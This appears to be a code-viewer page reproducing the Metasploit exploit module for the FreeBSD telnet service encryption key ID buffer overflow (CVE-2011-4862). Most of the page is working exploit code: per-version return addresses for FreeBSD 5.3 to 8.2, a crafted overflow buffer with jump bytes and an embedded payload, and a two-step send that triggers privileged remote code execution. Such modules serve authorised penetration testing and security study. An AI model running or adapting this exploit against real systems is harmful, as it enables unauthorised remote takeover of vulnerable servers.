Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
Views: 11783
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = GreatRanking910include Msf::Exploit::Remote::Telnet11include Msf::Exploit::BruteTargets1213def initialize(info = {})14super(update_info(info,15'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in the encryption option handler of the18FreeBSD telnet service.19},20'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],21'License' => MSF_LICENSE,22'References' =>23[24['CVE', '2011-4862'],25['OSVDB', '78020'],26['BID', '51182'],27['EDB', '18280']28],29'Privileged' => true,30'Platform' => 'bsd',31'Payload' =>32{33'Space' => 128,34'BadChars' => "\x00",35},3637'Targets' =>38[39[ 'Automatic', { } ],40[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx41[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx42[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx43[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx44[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx45[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx46[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx47[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx48# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)49[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return50# Versions 5.2 and below do not support encyption51],52'DefaultTarget' => 0,53'DisclosureDate' => '2011-12-23'))54end5556def exploit_target(t)5758connect59banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)60vprint_status(banner_sanitized)6162enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"63enc_keyid = "\xff\xfa\x26\x07"64end_suboption = "\xff\xf0"6566# Telnet protocol requires 0xff to be escaped with another67penc = payload.encoded.gsub("\xff", "\xff\xff")6869key_id = Rex::Text.rand_text_alphanumeric(400)70key_id[ 0, 2] = "\xeb\x76"71key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")72key_id[76, 4] = [ t['Ret'] ].pack("V")7374# Some of these bytes can get mangled, jump over them75key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)7677# Bounce to the real payload (avoid corruption)78key_id[120, 2] = "\xeb\x46"7980# The actual payload81key_id[192, penc.length] = penc8283# Create the Key ID command84sploit = enc_keyid + key_id + end_suboption8586# Initiate encryption87sock.put(enc_init)8889# Wait for a successful response90loop do91data = sock.get_once(-1, 5) rescue nil92if not data93fail_with(Failure::Unknown, "This system does not support encryption")94end95break if data.index("\xff\xfa\x26\x02\x01")96end9798# The first request smashes the pointer99print_status("Sending first payload")100sock.put(sploit)101102# Make sure the server replied to the first request103data = sock.get_once(-1, 5)104unless data105print_status("Server did not respond to first payload")106return107end108109# Some delay between each request seems necessary in some cases110::IO.select(nil, nil, nil, 0.5)111112# The second request results in the pointer being called113print_status("Sending second payload...")114sock.put(sploit)115116handler117118::IO.select(nil, nil, nil, 0.5)119disconnect120end121end122123124